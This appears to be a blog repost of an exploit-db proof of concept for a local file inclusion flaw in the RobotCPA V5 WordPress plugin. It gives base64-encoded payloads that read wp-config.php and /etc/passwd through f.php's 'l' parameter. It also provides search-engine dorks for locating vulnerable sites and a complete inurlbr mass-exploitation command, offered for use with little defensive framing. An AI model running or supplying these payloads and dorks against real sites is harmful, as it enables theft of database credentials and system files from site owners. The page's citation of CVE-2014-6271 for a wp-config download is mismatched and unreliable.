WordPress Plugin RobotCPA V5 – LFI Exploit

WordPress-Vulnerability
Exploit Title: WordPress Plugin RobotCPA V5 – Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/

The affected file is f.php and the get-parameter “l” is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
–exploit-get {you_get}
–exploit-get  “&index.php?id=10’´0x27”

base64 Encrypt values in base64.
Example: base64({value})
Usage:   base64(102030)
Usage:   –exploit-getuser?id=base64(102030)

Let’s use:
–exploit-get&l=base64(file:///etc/passwd)
or
–exploit-get “&l=base64(php://filter/resource=./../../../wp-config.php)

Dork:
inurl:”/wp-content/plugins/robotcpa/”
inurl:”plugins/robotcpa/f.php?l=”

Complete command
php inurlbr.php –dork ‘inurl:”plugins/robotcpa/f.php?l=”‘ –exploit-get “&l=base64(file:///etc/passwd)-s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file…

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation[‘LOCAL-FILE-INCLUSION-01’] = ‘/root:/’;
$validation[‘LOCAL-FILE-INCLUSION-02’] = ‘root:x:0:0:’;
$validation[‘LOCAL-FILE-INCLUSION-03’] = ‘mysql:x:’;
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file…

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation[‘CMS-WORDPRESS-01’] = “define(‘DB_NAME'”;
$validation[‘CMS-WORDPRESS-02’] = “define(‘DB_USER'”;
$validation[‘CMS-WORDPRESS-03’] = “define(‘DB_PASSWORD'”;
$validation[‘CMS-WORDPRESS-04’] = “define(‘DB_HOST'”;
Finding any of these values the script alert as vulnerable.

Captura de tela de 2015-06-23 13:47:40

Download:
http://github.com/googleinurl/SCANNER-INURLBR

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s